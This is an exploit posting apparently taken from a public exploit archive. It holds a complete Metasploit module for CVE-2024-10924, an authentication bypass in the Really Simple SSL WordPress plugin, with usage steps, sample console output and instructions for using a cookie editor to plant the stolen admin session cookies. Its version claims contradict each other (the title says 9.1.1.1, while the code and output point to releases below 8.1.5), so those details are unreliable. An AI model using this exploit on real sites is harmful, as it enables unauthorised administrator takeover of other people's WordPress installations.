=============================================================================================================================================
| # Title     : WordPress Really Simple Security 9.1.1.1 authentication bypass vulnerability                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
| # Vendor    : https://wordpress.org/plugins/                                                                                              |
=============================================================================================================================================

[+] References :  https://packetstorm.news/files/id/214234/ & CVE-2024-10924

[+] Summary    :  This module exploits an authentication bypass vulnerability (CVE-2024-10924) in the Really Simple SSL plugin for WordPress (versions <= 9.1.1.1). 
                  The vulnerability exists in the skip_onboarding REST API endpoint. 
				  When exploited, the module allows unauthenticated attackers to gain full administrator access by impersonating a valid user ID.

[+] Usage : 

# 1. Vulnerability Check

msf6 > use exploit/multi/http/wordpress_really_simple_ssl_auth_bypass
msf6 exploit(...) > set RHOSTS target.com
msf6 exploit(...) > set TARGETURI /wordpress
msf6 exploit(...) > check
[+] target.com:80 - Vulnerable version 8.1.3 detected

# 2. Exploiting the Vulnerability to Obtain Cookies

msf6 exploit(...) > exploit
[*] Starting authentication bypass attempt...
[+] Authentication bypass successful!

[+] Admin access confirmed!

[+] MANUAL EXPLOITATION INSTRUCTIONS
======================================
[+] Authentication Bypass Successful!

Cookies obtained: wordpress_logged_in_abc=...

[+] Next Steps:

1. Visit: http://target.com/wordpress/wp-admin

2. Use cookies from above

3. You should have admin access

# 3. Manual Exploitation
# Using curl or your browser with cookies

[+] POC :

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Really Simple SSL Plugin Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability (CVE-2024-10924) 
        in the Really Simple SSL plugin for WordPress (versions < 8.1.5). 
        The vulnerability exists in the skip_onboarding REST API endpoint. 
        When exploited, the module allows unauthenticated attackers to gain 
        full administrator access by impersonating a valid user ID.
      },
      'Author'         => [
        'JoshuaProvoste', # Original Discovery
        'indoushka'       # Professional Refinement
      ],
      'License'         => MSF_LICENSE,
      'References'      => [
        ['CVE', '2024-10924'],
        ['URL', 'https://www.wordfence.com/blog/2024/11/critical-authentication-bypass-vulnerability-patched-in-really-simple-ssl-plugin/'],
        ['URL', 'https://really-simple-ssl.com/cve-2024-10924-authentication-bypass/']
      ],
      'DisclosureDate' => '2024-11-06',
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [
        ['WordPress Really Simple SSL < 8.1.5', {}]
      ],
      'DefaultTarget'  => 0,
      'Notes'          => {
        'Stability'   => [CRASH_SAFE],
        'Reliability' => [RELIABLE_SIDE_EFFECTS],
        'SideEffects' => [IOC_IN_LOGS]
      }
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
      OptInt.new('USER_ID', [true, 'User ID to impersonate (Administrator is usually 1)', 1])
    ])
  end

  def check
    vprint_status("Checking Really Simple SSL version...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-content/plugins/really-simple-ssl/readme.txt')
    })

    return CheckCode::Unknown('Target unreachable') unless res

    if res.code == 200 && res.body.include?('Really Simple SSL')
      version = res.body.scan(/Stable tag:\s*([\d.]+)/).flatten.first
      if version
        vprint_status("Found version: #{version}")
        if Rex::Version.new(version) < Rex::Version.new('8.1.5')
          return CheckCode::Appears("Vulnerable version #{version} detected")
        end
        return CheckCode::Safe("Version #{version} is not vulnerable")
      end
    end
    CheckCode::Safe
  end

  def exploit
    api_path = normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding')
    
    print_status("Attempting authentication bypass on #{datastore['RHOST']}...")

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => api_path,
      'headers' => { 'Content-Type' => 'application/json' },
      'data'    => {
        'user_id' => datastore['USER_ID'],
        'login_nonce' => Rex::Text.rand_text_alphanumeric(14),
        'redirect_to' => '/wp-admin/'
      }.to_json
    })

    unless res && res.get_cookies =~ /wordpress_(logged_in|sec)_/
      fail_with(Failure::NoAccess, "Bypass failed. No valid session cookies found in response.")
    end

    @cookies = res.get_cookies
    print_good("Successfully obtained authentication cookies.")

    print_status("Verifying administrative access...")
    if verify_admin_access
      print_good("Admin access confirmed via dashboard check!")

      loot_path = store_loot(
        'wp.cookies',
        'text/plain',
        datastore['RHOST'],
        @cookies,
        'wordpress_session_cookies',
        "CVE-2024-10924 Auth Bypass - User ID: #{datastore['USER_ID']}"
      )
      print_status("Session cookies stored at: #{loot_path}")

      report_instructions
      return
    else
      print_warning("Cookies obtained but admin verification failed. User ID might not have admin rights.")
      print_line("Cookies: #{@cookies}")
    end
  end

  def verify_admin_access

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'wp-admin', 'plugin-install.php'),
      'cookie' => @cookies
    })

    res && res.code == 200 && res.body.include?('plugin-install.php') && !res.body.include?('wp-login.php')
  end

  def report_instructions
    admin_url = full_uri(normalize_uri(target_uri.path, 'wp-admin/'))
    
    print_line("\n" + "="*70)
    print_line(" EXPLOITATION COMPLETED SUCCESSFULLY")
    print_line("="*70)
    print_line("Admin URL: #{admin_url}")
    print_line("Cookies:   #{@cookies}")
    print_line("\nInstructions:")
    print_line("1. Open your browser and navigate to the Admin URL.")
    print_line("2. Use a cookie editor extension to inject the cookies above.")
    print_line("3. Refresh the page to access the WordPress dashboard.")
    print_line("="*70 + "\n")
  end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================